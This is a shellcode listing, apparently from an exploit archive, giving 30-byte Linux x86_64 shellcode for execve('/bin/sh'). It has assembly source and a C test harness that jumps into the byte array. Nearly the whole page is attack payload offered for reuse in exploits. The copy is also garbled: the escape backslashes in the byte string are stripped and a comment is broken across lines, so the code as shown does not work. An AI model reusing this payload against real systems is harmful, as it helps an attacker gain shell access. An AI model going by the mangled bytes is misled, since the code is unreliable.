Linux/x86_64 execve("/bin/sh"); 30 bytes shellcode

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Linux/x86_64 execve("/bin/sh"); 30 bytes shellcode
# Published : 2010-04-25
# Author : zbt
# Previous Title : Linux x86 - execve("/bin/bash","-p",NULL) - 33 bytes
# Next Title : Linux/x86_64 reboot(POWER_OFF) 19 bytes shellcode

# Linux/x86_64 execve("/bin/sh"); 30 bytes shellcode
# Date: 2010-04-26
# Author: zbt
# Tested on: x86_64 Debian GNU/Linux

/*
	; execve("/bin/sh", ["/bin/sh"], NULL)

	section .text
		    global _start

	_start:
		    xor     rdx, rdx
		    mov     qword rbx, '//bin/sh'
		    shr     rbx, 0x8
		    push    rbx
		    mov     rdi, rsp
		    push    rax
		    push    rdi
		    mov     rsi, rsp
		    mov     al, 0x3b
		    syscall
*/

int main(void)
{
	char shellcode[] =
	"x48x31xd2"                                  // xor    %rdx, %rdx
	"x48xbbx2fx2fx62x69x6ex2fx73x68"      // mov
$0x68732f6e69622f2f, %rbx
	"x48xc1xebx08"                              // shr    $0x8, %rbx
	"x53"                                          // push   %rbx
	"x48x89xe7"                                  // mov    %rsp, %rdi
	"x50"                                          // push   %rax
	"x57"                                          // push   %rdi
	"x48x89xe6"                                  // mov    %rsp, %rsi
	"xb0x3b"                                      // mov    $0x3b, %al
	"x0fx05";                                     // syscall

	(*(void (*)()) shellcode)();
	
	return 0;
}